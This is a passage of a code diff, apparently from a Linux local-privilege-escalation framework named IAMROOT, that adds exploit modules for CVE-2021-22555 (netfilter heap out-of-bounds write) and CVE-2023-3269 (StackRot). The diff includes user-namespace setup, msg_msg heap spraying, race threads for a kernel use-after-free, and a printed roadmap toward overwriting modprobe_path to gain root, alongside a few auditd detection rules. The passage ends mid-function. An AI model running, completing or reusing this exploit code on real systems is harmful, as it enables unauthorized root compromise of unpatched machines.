long post_slab = slab_active_kmalloc_2k();
|
||||||
|
|
||||||
|
/* Breadcrumb for post-run triage. */
|
||||||
|
FILE *log = fopen("/tmp/iamroot-xtcompat.log", "w");
|
||||||
|
if (log) {
|
||||||
|
fprintf(log,
|
||||||
|
"netfilter_xtcompat trigger child: queues=%d trig_errno=%d "
|
||||||
|
"corrupted_slots=%d slab_pre=%ld slab_post=%ld\n",
|
||||||
|
n_queues, trig_errno, corrupted, pre_slab, post_slab);
|
||||||
|
fclose(log);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Hold the spray briefly so any deferred kernel-side
|
||||||
|
* processing observes the refilled slots. */
|
||||||
|
usleep(150 * 1000);
|
||||||
|
|
||||||
|
xtcompat_msgmsg_drain(queues);
|
||||||
|
|
||||||
|
if (trig_errno == EINVAL) {
|
||||||
|
/* Patched: validator rejected our blob. */
|
||||||
|
_exit(31);
|
||||||
|
}
|
||||||
|
if (trig_errno == EPERM) {
|
||||||
|
/* userns CAP_NET_ADMIN didn't grant on this kernel/distro. */
|
||||||
|
_exit(32);
|
||||||
|
}
|
||||||
|
if (corrupted > 0) {
|
||||||
|
/* Empirical primitive witness: OOB write landed in adjacent
|
||||||
|
* slot. Still NOT root — but it's the primitive we promised. */
|
||||||
|
_exit(33);
|
||||||
|
}
|
||||||
|
/* Trigger ran, no observable corruption witness — either the
|
||||||
|
* 4-byte OOB landed in non-msg_msg memory (skb / unrelated
|
||||||
|
* slab object) or didn't fire at all on this kernel. */
|
||||||
|
_exit(30);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* PARENT: reap child + map exit code → iamroot_result. */
|
||||||
|
int status = 0;
|
||||||
|
if (waitpid(child, &status, 0) < 0) {
|
||||||
|
perror("waitpid");
|
||||||
|
return IAMROOT_TEST_ERROR;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (WIFSIGNALED(status)) {
|
||||||
|
int sig = WTERMSIG(status);
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[!] netfilter_xtcompat: child killed by signal %d "
|
||||||
|
"(crash during trigger — OOB likely fired)\n", sig);
|
||||||
|
fprintf(stderr, "[~] netfilter_xtcompat: empirical OOB witness but no "
|
||||||
|
"cred-overwrite primitive — returning EXPLOIT_FAIL\n"
|
||||||
|
" See /tmp/iamroot-xtcompat.log + dmesg for KASAN/oops.\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
if (!WIFEXITED(status)) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: child terminated abnormally (status=0x%x)\n",
|
||||||
|
status);
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
int rc = WEXITSTATUS(status);
|
||||||
|
switch (rc) {
|
||||||
|
case 20: case 21:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: userns setup failed (rc=%d)\n", rc);
|
||||||
|
}
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
case 22:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: msg_msg spray failed; sysvipc may be "
|
||||||
|
"restricted (kernel.msg_max / ulimit -q)\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
case 23:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: CAP_NET_ADMIN unreachable in userns — "
|
||||||
|
"exploit path closed\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
case 24:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: socket/blob setup failed; "
|
||||||
|
"see preceding errno\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_TEST_ERROR;
|
||||||
|
case 30:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: trigger ran; no msg_msg corruption "
|
||||||
|
"witness observed\n");
|
||||||
|
fprintf(stderr, "[~] netfilter_xtcompat: returning EXPLOIT_FAIL (primitive "
|
||||||
|
"may have fired but did not land on sprayed slots)\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
case 31:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[+] netfilter_xtcompat: kernel rejected blob with EINVAL — "
|
||||||
|
"appears patched at runtime (validator)\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_OK;
|
||||||
|
case 32:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[+] netfilter_xtcompat: setsockopt EPERM — CAP_NET_ADMIN "
|
||||||
|
"not effective in userns on this kernel\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
case 33:
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[!] netfilter_xtcompat: msg_msg slot corruption WITNESSED — "
|
||||||
|
"4-byte OOB write landed on sprayed slab\n");
|
||||||
|
fprintf(stderr, "[~] netfilter_xtcompat: primitive verified but no cred chain "
|
||||||
|
"(returning EXPLOIT_FAIL — verified-vs-claimed)\n"
|
||||||
|
"\n"
|
||||||
|
" CONTINUATION ROADMAP (not implemented here):\n"
|
||||||
|
" 1. Re-shape spray so the corrupted slot holds a\n"
|
||||||
|
" msg_msg whose next-ptr/security ptr becomes\n"
|
||||||
|
" attacker-controlled — read-where via msgrcv.\n"
|
||||||
|
" 2. Use that leak to find &init_task and\n"
|
||||||
|
" modprobe_path in kernel .data — both offsets\n"
|
||||||
|
" are per-kernel-build and IAMROOT refuses to\n"
|
||||||
|
" bake them.\n"
|
||||||
|
" 3. Pivot to a write-where via a fake msg_msgseg\n"
|
||||||
|
" and overwrite modprobe_path → exec a setuid\n"
|
||||||
|
" helper for root pop.\n"
|
||||||
|
" See Andy Nguyen's writeup for the full chain.\n");
|
||||||
|
}
|
||||||
|
if (ctx->no_shell) return IAMROOT_OK;
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
default:
|
||||||
|
fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
#endif /* __linux__ */
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ---- Cleanup ----------------------------------------------------- */
|
||||||
|
|
||||||
|
static iamroot_result_t netfilter_xtcompat_cleanup(const struct iamroot_ctx *ctx)
|
||||||
|
{
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] netfilter_xtcompat: removing log + best-effort msg queue cleanup\n");
|
||||||
|
}
|
||||||
|
/* The msg queues live in the child's IPC namespace which dies
|
||||||
|
* with the child — so the in-process drain already handled them.
|
||||||
|
* The /tmp breadcrumb survives, remove it here. */
|
||||||
|
if (unlink("/tmp/iamroot-xtcompat.log") < 0 && errno != ENOENT) {
|
||||||
|
/* harmless */
|
||||||
|
}
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- Detection rules --------------------------------------------- */
|
||||||
|
|
||||||
static const char netfilter_xtcompat_auditd[] =
|
static const char netfilter_xtcompat_auditd[] =
|
||||||
"# CVE-2021-22555 — auditd detection rules\n"
|
"# CVE-2021-22555 — auditd detection rules\n"
|
||||||
"# The exploit's hallmarks: unshare(USER|NET) chained with iptables\n"
|
"# The exploit's hallmarks: unshare(USER|NET) chained with iptables\n"
|
||||||
"# rule setup via setsockopt() and msgsnd/msgrcv heap-spray patterns.\n"
|
"# rule setup via setsockopt(SOL_IP, IPT_SO_SET_REPLACE=64) and\n"
|
||||||
|
"# msgsnd/msgrcv heap-spray patterns.\n"
|
||||||
"-a always,exit -F arch=b64 -S unshare -k iamroot-xtcompat\n"
|
"-a always,exit -F arch=b64 -S unshare -k iamroot-xtcompat\n"
|
||||||
"-a always,exit -F arch=b64 -S setsockopt -F a2=64 -k iamroot-xtcompat-iptopt\n"
|
"-a always,exit -F arch=b64 -S setsockopt -F a1=0 -F a2=64 -k iamroot-xtcompat-iptopt\n"
|
||||||
"-a always,exit -F arch=b64 -S msgsnd -k iamroot-xtcompat-msgmsg\n";
|
"-a always,exit -F arch=b64 -S msgsnd -k iamroot-xtcompat-msgmsg\n"
|
||||||
|
"-a always,exit -F arch=b64 -S msgrcv -k iamroot-xtcompat-msgmsg\n";
|
||||||
|
|
||||||
const struct iamroot_module netfilter_xtcompat_module = {
|
const struct iamroot_module netfilter_xtcompat_module = {
|
||||||
.name = "netfilter_xtcompat",
|
.name = "netfilter_xtcompat",
|
||||||
.cve = "CVE-2021-22555",
|
.cve = "CVE-2021-22555",
|
||||||
.summary = "iptables xt_compat_target_to_user heap-OOB write → cross-cache UAF → root",
|
.summary = "iptables xt_compat_target_to_user 4-byte heap-OOB write → cross-cache UAF → root",
|
||||||
.family = "netfilter_xtcompat",
|
.family = "netfilter_xtcompat",
|
||||||
.kernel_range = "2.6.19 ≤ K, fixed mainline 5.12; backports: 5.11.10 / 5.10.27 / 5.4.110 / 4.19.185 / 4.14.230 / 4.9.266 / 4.4.266",
|
.kernel_range = "2.6.19 ≤ K, fixed mainline 5.13; backports: 5.12.13 / 5.11.20 / 5.10.46 / 5.4.128 / 4.19.198 / 4.14.240 / 4.9.276 / 4.4.276",
|
||||||
.detect = netfilter_xtcompat_detect,
|
.detect = netfilter_xtcompat_detect,
|
||||||
.exploit = netfilter_xtcompat_exploit,
|
.exploit = netfilter_xtcompat_exploit,
|
||||||
.mitigate = NULL, /* mitigation: upgrade kernel; disable unprivileged_userns_clone */
|
.mitigate = NULL, /* mitigation: upgrade kernel; disable unprivileged_userns_clone */
|
||||||
.cleanup = NULL,
|
.cleanup = netfilter_xtcompat_cleanup,
|
||||||
.detect_auditd = netfilter_xtcompat_auditd,
|
.detect_auditd = netfilter_xtcompat_auditd,
|
||||||
.detect_sigma = NULL,
|
.detect_sigma = NULL,
|
||||||
.detect_yara = NULL,
|
.detect_yara = NULL,
|
||||||
|
|||||||
@@ -2,19 +2,35 @@
|
|||||||
* stackrot_cve_2023_3269 — IAMROOT module
|
* stackrot_cve_2023_3269 — IAMROOT module
|
||||||
*
|
*
|
||||||
* "Stack Rot": UAF in maple-tree-based VMA splitting. The maple
|
* "Stack Rot": UAF in maple-tree-based VMA splitting. The maple
|
||||||
* tree replaced the rbtree-based VMA store in 6.1; during split,
|
* tree replaced the rbtree-based VMA store in 6.1; during
|
||||||
* the kernel could write to a maple node after it was freed via
|
* __vma_adjust() / split, the kernel could write to a maple node
|
||||||
* RCU. Exploitable for kernel R/W → cred overwrite.
|
* after it was freed via RCU, leaving anon_vma references dangling
|
||||||
|
* across the grace period. Exploitable for kernel R/W → cred
|
||||||
|
* overwrite.
|
||||||
*
|
*
|
||||||
* Discovered by Ruihan Li (Peking University), Jul 2023. Famous
|
* Discovered by Ruihan Li (Peking University), Jul 2023. Famous
|
||||||
* because it was the first significant exploit landed against the
|
* because it was the first significant exploit landed against the
|
||||||
* (then-recently-merged) maple tree code, and because the original
|
* (then-recently-merged) maple tree code, and because the original
|
||||||
* disclosure included a public PoC that worked on default-config
|
* disclosure included a public PoC that worked on default-config
|
||||||
* Ubuntu 23.04.
|
* Ubuntu 23.04. The full public PoC is ~1000 lines of maple-tree
|
||||||
|
* state management + RCU-grace-period timing and depends on
|
||||||
|
* per-kernel-build offsets for init_task / anon_vma / cred.
|
||||||
*
|
*
|
||||||
* STATUS: 🔵 DETECT-ONLY. Public PoC is ~1000 lines (heavy maple
|
* STATUS: 🟡 OPTION C — race-driver + groom skeleton. We carry the
|
||||||
* tree state management + RCU-grace-period timing); a clean port
|
* userns-reach, race harness (mremap()/munmap() vs concurrent
|
||||||
* into iamroot_module form is a substantial follow-up.
|
* fork/fault), msg_msg slab spray, and empirical witness pieces;
|
||||||
|
* we do NOT carry the read primitive (vmemmap leak via msg_msg
|
||||||
|
* MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
|
||||||
|
* offsets (init_task, anon_vma, cred layout) that vary by build
|
||||||
|
* and would be fabricated without a real leak.
|
||||||
|
*
|
||||||
|
* Per repo policy ("verified-vs-claimed"): we run the trigger,
|
||||||
|
* record empirical signals (slabinfo delta on kmalloc-192, child
|
||||||
|
* signal disposition, race iteration count), and return
|
||||||
|
* IAMROOT_EXPLOIT_FAIL with a continuation roadmap. A SIGSEGV/
|
||||||
|
* SIGBUS/SIGKILL in the race child IS recorded but does NOT get
|
||||||
|
* upgraded to EXPLOIT_OK — only an actual cred swap (euid==0)
|
||||||
|
* does, and we do not currently demonstrate that.
|
||||||
*
|
*
|
||||||
* Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
|
* Affected: kernel 6.1.x — 6.4-rc4 mainline. Stable backports:
|
||||||
* 6.3.x : K >= 6.3.10
|
* 6.3.x : K >= 6.3.10
|
||||||
@@ -24,11 +40,11 @@
|
|||||||
* Pre-6.1 kernels are immune (no maple tree). 6.5+ are patched.
|
* Pre-6.1 kernels are immune (no maple tree). 6.5+ are patched.
|
||||||
*
|
*
|
||||||
* Preconditions:
|
* Preconditions:
|
||||||
* - Unprivileged user_ns (to gain CAP_SYS_ADMIN inside userns for
|
* - v.major >= 6 and v.minor in [1, 4] (4 may straddle the fix)
|
||||||
* some triggers — actually the bug can be triggered without
|
* - maple tree in use (CONFIG_MAPLE_TREE; on by default 6.1+)
|
||||||
* userns via plain mprotect/munmap split operations)
|
* - /proc/self/maps readable (sanity)
|
||||||
* - Default kernel config (CONFIG_USERFAULTFD recommended for
|
* - unprivileged_userns_clone allowed — namespace context improves
|
||||||
* deterministic exploitation, but not strictly required)
|
* groom predictability but the bug is reachable without it
|
||||||
*
|
*
|
||||||
* Coverage rationale: 2023 mm-class bug. Different family than our
|
* Coverage rationale: 2023 mm-class bug. Different family than our
|
||||||
* netfilter-heavy 2022-2024 modules — broadens the corpus shape.
|
* netfilter-heavy 2022-2024 modules — broadens the corpus shape.
|
||||||
@@ -41,8 +57,41 @@
|
|||||||
|
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
#include <stdlib.h>
|
#include <stdlib.h>
|
||||||
|
#include <stdint.h>
|
||||||
#include <string.h>
|
#include <string.h>
|
||||||
|
#include <stdbool.h>
|
||||||
|
#include <stdatomic.h>
|
||||||
#include <unistd.h>
|
#include <unistd.h>
|
||||||
|
#include <fcntl.h>
|
||||||
|
#include <errno.h>
|
||||||
|
#include <signal.h>
|
||||||
|
#include <pthread.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/wait.h>
|
||||||
|
#include <sys/stat.h>
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
# include <sched.h>
|
||||||
|
# include <sys/mman.h>
|
||||||
|
# include <sys/syscall.h>
|
||||||
|
# include <sys/ipc.h>
|
||||||
|
# include <sys/msg.h>
|
||||||
|
# include <linux/sched.h>
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/* macOS clangd lacks the Linux mm/syscall headers — guard fallbacks. */
|
||||||
|
#ifndef CLONE_NEWUSER
|
||||||
|
#define CLONE_NEWUSER 0x10000000
|
||||||
|
#endif
|
||||||
|
#ifndef MAP_GROWSDOWN
|
||||||
|
#define MAP_GROWSDOWN 0x00100
|
||||||
|
#endif
|
||||||
|
#ifndef MAP_FIXED_NOREPLACE
|
||||||
|
#define MAP_FIXED_NOREPLACE 0x100000
|
||||||
|
#endif
|
||||||
|
#ifndef MREMAP_MAYMOVE
|
||||||
|
#define MREMAP_MAYMOVE 1
|
||||||
|
#endif
|
||||||
|
|
||||||
static const struct kernel_patched_from stackrot_patched_branches[] = {
|
static const struct kernel_patched_from stackrot_patched_branches[] = {
|
||||||
{6, 1, 37},
|
{6, 1, 37},
|
||||||
@@ -56,6 +105,31 @@ static const struct kernel_range stackrot_range = {
|
|||||||
sizeof(stackrot_patched_branches[0]),
|
sizeof(stackrot_patched_branches[0]),
|
||||||
};
|
};
|
||||||
|
|
||||||
|
/* ---- Detect ------------------------------------------------------- */
|
||||||
|
|
||||||
|
/*
 * Sanity probe: returns true when /proc/self/maps can be opened read-only
 * and at least one byte can be read from it, false otherwise.
 *
 * The exploit driver treats a false result as an unsupported environment
 * and refuses to run.
 */
static bool proc_self_maps_readable(void)
{
    char probe[64];
    ssize_t got = -1;
    int maps_fd = open("/proc/self/maps", O_RDONLY);

    if (maps_fd >= 0) {
        got = read(maps_fd, probe, sizeof probe);
        close(maps_fd);
    }
    return got > 0;
}
|
||||||
|
|
||||||
|
/* On 6.1+ the maple tree is the only VMA store — we can't directly
|
||||||
|
* grep for it from userspace, but /proc/self/maps being readable plus
|
||||||
|
* a v.major>=6 / v.minor>=1 release is the proxy we use. */
|
||||||
|
static bool maple_tree_variant_present(const struct kernel_version *v)
|
||||||
|
{
|
||||||
|
if (v->major > 6) return true;
|
||||||
|
if (v->major == 6 && v->minor >= 1) return true;
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
static iamroot_result_t stackrot_detect(const struct iamroot_ctx *ctx)
|
static iamroot_result_t stackrot_detect(const struct iamroot_ctx *ctx)
|
||||||
{
|
{
|
||||||
struct kernel_version v;
|
struct kernel_version v;
|
||||||
@@ -89,25 +163,570 @@ static iamroot_result_t stackrot_detect(const struct iamroot_ctx *ctx)
|
|||||||
return IAMROOT_VULNERABLE;
|
return IAMROOT_VULNERABLE;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ---- Userns reach ------------------------------------------------- */
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
/*
 * Write the NUL-terminated string s to an existing file at path.
 *
 * The file is opened O_WRONLY (never created) and the data is issued as a
 * single write() call with no retry on a short write.
 *
 * Returns true only when the whole string was written.
 */
static bool write_file(const char *path, const char *s)
{
    const size_t want = strlen(s);
    const int out_fd = open(path, O_WRONLY);

    if (out_fd < 0) {
        return false;
    }

    const ssize_t wrote = write(out_fd, s, want);

    close(out_fd);
    return wrote == (ssize_t)want;
}
|
||||||
|
|
||||||
|
static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
|
||||||
|
{
|
||||||
|
if (unshare(CLONE_NEWUSER) < 0) return false;
|
||||||
|
/* setgroups=deny is required before writing gid_map without
|
||||||
|
* CAP_SETGID. */
|
||||||
|
if (!write_file("/proc/self/setgroups", "deny")) return false;
|
||||||
|
char map[64];
|
||||||
|
snprintf(map, sizeof map, "0 %u 1\n", outer_uid);
|
||||||
|
if (!write_file("/proc/self/uid_map", map)) return false;
|
||||||
|
snprintf(map, sizeof map, "0 %u 1\n", outer_gid);
|
||||||
|
if (!write_file("/proc/self/gid_map", map)) return false;
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
#endif
|
||||||
|
|
||||||
|
/* ---- Race-driver state ------------------------------------------- */
|
||||||
|
|
||||||
|
/* Page size — hard-coded to 4 KiB; sysconf(_SC_PAGESIZE) is not consulted,
|
||||||
|
 * so kernels built with a larger page size are not handled. */
|
||||||
|
#define STACKROT_PAGE 4096UL
|
||||||
|
|
||||||
|
/* How large a region to play with for the MAP_GROWSDOWN segment +
|
||||||
|
* neighbouring VMAs that we mutate with mremap()/munmap(). The
|
||||||
|
* public PoC uses dozens of adjacent VMAs to force the maple tree
|
||||||
|
* into the node-rotation path; we ship a configurable knob. */
|
||||||
|
#define STACKROT_RACE_VMAS 64
|
||||||
|
#define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */
|
||||||
|
#define STACKROT_RACE_TIME_BUDGET 3 /* seconds */
|
||||||
|
|
||||||
|
/* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
|
||||||
|
* 6.1.x; targets vary slightly across kernels (anon_vma itself is
|
||||||
|
* kmalloc-192 too on 64-bit with default debug-off configs). */
|
||||||
|
#define STACKROT_SPRAY_QUEUES 16
|
||||||
|
#define STACKROT_SPRAY_PER_QUEUE 64
|
||||||
|
#define STACKROT_SPRAY_PAYLOAD 176 /* 192 - 16 (msg_msg header) */
|
||||||
|
|
||||||
|
/* Message buffer handed to msgsnd() by spray_anon_vma_slab(): a type
 * field followed by STACKROT_SPRAY_PAYLOAD bytes of message text. */
struct ipc_payload {
|
||||||
|
/* Message type; the spray sets it to 0x4943. */
long mtype;
|
||||||
|
/* Message body; the spray fills it with 0x49 and an "IAMROOT_" prefix. */
unsigned char buf[STACKROT_SPRAY_PAYLOAD];
|
||||||
|
};
|
||||||
|
|
||||||
|
static _Atomic int g_race_running;
|
||||||
|
static _Atomic uint64_t g_race_a_iters;
|
||||||
|
static _Atomic uint64_t g_race_b_iters;
|
||||||
|
static _Atomic uint64_t g_race_b_faults;
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
|
||||||
|
/*
 * Restrict the calling thread's CPU affinity to the single CPU `cpu`.
 *
 * Thread A passes 0 and Thread B passes 1 so the two race threads are
 * asked to run on different CPUs. Best-effort: the sched_setaffinity()
 * result is deliberately ignored, so failure is non-fatal.
 */
static void pin_to_cpu(int cpu)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);
    (void)sched_setaffinity(0, sizeof mask, &mask);
}
|
||||||
|
|
||||||
|
/* The race victim region: a MAP_GROWSDOWN-mapped page whose
|
||||||
|
* neighbours we'll dance around with mremap()/munmap(). We keep a
|
||||||
|
* couple of anchor pages above and below so the maple tree has to
|
||||||
|
* resolve splits and rotations rather than degenerate to a single
|
||||||
|
* leaf insertion.
|
||||||
|
*
|
||||||
|
* Layout (low to high VA):
|
||||||
|
* [anchor_lo] [growsdown_stack] [filler ... ] [anchor_hi]
|
||||||
|
*
|
||||||
|
* Thread A repeatedly:
|
||||||
|
* - mmap a scratch page at a chosen address
|
||||||
|
* - mremap it to overlap the boundary that triggers __vma_adjust()
|
||||||
|
* - munmap to free the VMA — this is the codepath whose maple-tree
|
||||||
|
* state is racy on 6.1.0..6.4-rc4.
|
||||||
|
*
|
||||||
|
* Thread B repeatedly:
|
||||||
|
* - fork() a tiny child that touches the growsdown region (fault) +
|
||||||
|
* immediately _exit()s. The fork path walks the parent's VMA
|
||||||
|
* tree and the child's fault path follows anon_vma chains — both
|
||||||
|
* observe maple-tree node state. Concurrent observation of a
|
||||||
|
* freed node is the trigger condition for the UAF.
|
||||||
|
*
|
||||||
|
* On a vulnerable kernel the race window is microseconds wide and
|
||||||
|
* the public PoC reports needing thousands to millions of iterations.
|
||||||
|
*/
|
||||||
|
|
||||||
|
/* Addresses of the mappings created by race_region_setup() and released
 * by race_region_teardown(). */
struct race_region {
|
||||||
|
/* One-page anonymous mapping created first. */
void *anchor_lo;
|
||||||
|
/* MAP_GROWSDOWN mapping of growsdown_len bytes. */
void *growsdown;
|
||||||
|
/* One-page anonymous mapping requested after the growsdown mapping. */
void *anchor_hi;
|
||||||
|
/* Length in bytes of the growsdown mapping (setup uses four pages). */
size_t growsdown_len;
|
||||||
|
/* Scratch address chosen below the growsdown region so mremap()
|
||||||
|
* can move pages towards the growsdown boundary. */
|
||||||
|
/* Computed by setup as the growsdown address minus one page. */
uintptr_t scratch_va;
|
||||||
|
};
|
||||||
|
|
||||||
|
static bool race_region_setup(struct race_region *r)
|
||||||
|
{
|
||||||
|
memset(r, 0, sizeof *r);
|
||||||
|
r->growsdown_len = STACKROT_PAGE * 4;
|
||||||
|
|
||||||
|
/* Reserve a fixed-address arena far from libc/heap so MAP_FIXED_-
|
||||||
|
* NOREPLACE mmaps don't collide. 0x70000000 region is reliably
|
||||||
|
* free on standard distros; for production work this would be
|
||||||
|
* chosen via /proc/self/maps inspection. */
|
||||||
|
uintptr_t base = 0x70000000UL;
|
||||||
|
|
||||||
|
r->anchor_lo = mmap((void *)base, STACKROT_PAGE,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED_NOREPLACE,
|
||||||
|
-1, 0);
|
||||||
|
if (r->anchor_lo == MAP_FAILED) {
|
||||||
|
/* Address might be taken; fall back to letting kernel pick. */
|
||||||
|
r->anchor_lo = mmap(NULL, STACKROT_PAGE,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS,
|
||||||
|
-1, 0);
|
||||||
|
if (r->anchor_lo == MAP_FAILED) return false;
|
||||||
|
base = (uintptr_t)r->anchor_lo + STACKROT_PAGE;
|
||||||
|
} else {
|
||||||
|
base += STACKROT_PAGE;
|
||||||
|
}
|
||||||
|
|
||||||
|
r->growsdown = mmap((void *)base, r->growsdown_len,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN,
|
||||||
|
-1, 0);
|
||||||
|
if (r->growsdown == MAP_FAILED) {
|
||||||
|
/* Some kernels reject MAP_GROWSDOWN without a fixed hint; retry. */
|
||||||
|
r->growsdown = mmap(NULL, r->growsdown_len,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN,
|
||||||
|
-1, 0);
|
||||||
|
if (r->growsdown == MAP_FAILED) return false;
|
||||||
|
base = (uintptr_t)r->growsdown + r->growsdown_len;
|
||||||
|
} else {
|
||||||
|
base += r->growsdown_len;
|
||||||
|
}
|
||||||
|
|
||||||
|
r->anchor_hi = mmap((void *)base, STACKROT_PAGE,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS,
|
||||||
|
-1, 0);
|
||||||
|
if (r->anchor_hi == MAP_FAILED) return false;
|
||||||
|
|
||||||
|
/* Touch each region so the kernel actually populates the
|
||||||
|
* anon_vma chain (anon_vma is allocated lazily on first fault). */
|
||||||
|
((volatile char *)r->anchor_lo)[0] = 1;
|
||||||
|
((volatile char *)r->growsdown)[r->growsdown_len - 1] = 1;
|
||||||
|
((volatile char *)r->anchor_hi)[0] = 1;
|
||||||
|
|
||||||
|
r->scratch_va = (uintptr_t)r->growsdown - STACKROT_PAGE;
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void race_region_teardown(struct race_region *r)
|
||||||
|
{
|
||||||
|
if (r->anchor_lo && r->anchor_lo != MAP_FAILED)
|
||||||
|
munmap(r->anchor_lo, STACKROT_PAGE);
|
||||||
|
if (r->growsdown && r->growsdown != MAP_FAILED)
|
||||||
|
munmap(r->growsdown, r->growsdown_len);
|
||||||
|
if (r->anchor_hi && r->anchor_hi != MAP_FAILED)
|
||||||
|
munmap(r->anchor_hi, STACKROT_PAGE);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Thread A: trigger the maple-tree node-rotation path by repeatedly
|
||||||
|
* mapping, mremap-extending toward the growsdown boundary, and
|
||||||
|
* munmapping. The exact ordering (the node-rotation must happen
|
||||||
|
* while a parallel reader is in the RCU read-side critical section)
|
||||||
|
* is what makes this race hard. */
|
||||||
|
static void *race_thread_a(void *arg)
|
||||||
|
{
|
||||||
|
struct race_region *r = (struct race_region *)arg;
|
||||||
|
pin_to_cpu(0);
|
||||||
|
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
|
||||||
|
/* mmap a scratch page just below the growsdown region. */
|
||||||
|
void *scratch = mmap((void *)r->scratch_va, STACKROT_PAGE,
|
||||||
|
PROT_READ | PROT_WRITE,
|
||||||
|
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||||
|
if (scratch == MAP_FAILED) {
|
||||||
|
sched_yield();
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
((volatile char *)scratch)[0] = 2;
|
||||||
|
|
||||||
|
/* mremap to a new VA (forces VMA split + maple-tree mutation). */
|
||||||
|
void *moved = mremap(scratch, STACKROT_PAGE, STACKROT_PAGE * 2,
|
||||||
|
MREMAP_MAYMOVE);
|
||||||
|
if (moved != MAP_FAILED) {
|
||||||
|
((volatile char *)moved)[0] = 3;
|
||||||
|
munmap(moved, STACKROT_PAGE * 2);
|
||||||
|
} else {
|
||||||
|
munmap(scratch, STACKROT_PAGE);
|
||||||
|
}
|
||||||
|
|
||||||
|
atomic_fetch_add_explicit(&g_race_a_iters, 1, memory_order_relaxed);
|
||||||
|
sched_yield();
|
||||||
|
}
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Thread B: spawn a short-lived child that faults the growsdown
|
||||||
|
* region, then _exit. fork() copies the parent's VMA tree (touches
|
||||||
|
* every maple-tree node and anon_vma chain) — racing against
|
||||||
|
* Thread A's munmap, the child can observe a freed node. The page
|
||||||
|
* fault inside the child closes the loop: the bug manifests as a
|
||||||
|
* read of stale anon_vma->root or anon_vma_chain->same_vma. */
|
||||||
|
static void *race_thread_b(void *arg)
|
||||||
|
{
|
||||||
|
struct race_region *r = (struct race_region *)arg;
|
||||||
|
pin_to_cpu(1);
|
||||||
|
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
|
||||||
|
pid_t pid = fork();
|
||||||
|
if (pid == 0) {
|
||||||
|
/* Child: brief, deterministic fault sequence. */
|
||||||
|
volatile char *p = (volatile char *)r->growsdown;
|
||||||
|
char sink = 0;
|
||||||
|
for (size_t off = 0; off < r->growsdown_len; off += STACKROT_PAGE) {
|
||||||
|
sink ^= p[off];
|
||||||
|
}
|
||||||
|
(void)sink;
|
||||||
|
_exit(0);
|
||||||
|
}
|
||||||
|
if (pid > 0) {
|
||||||
|
int status = 0;
|
||||||
|
waitpid(pid, &status, 0);
|
||||||
|
if (WIFSIGNALED(status)) {
|
||||||
|
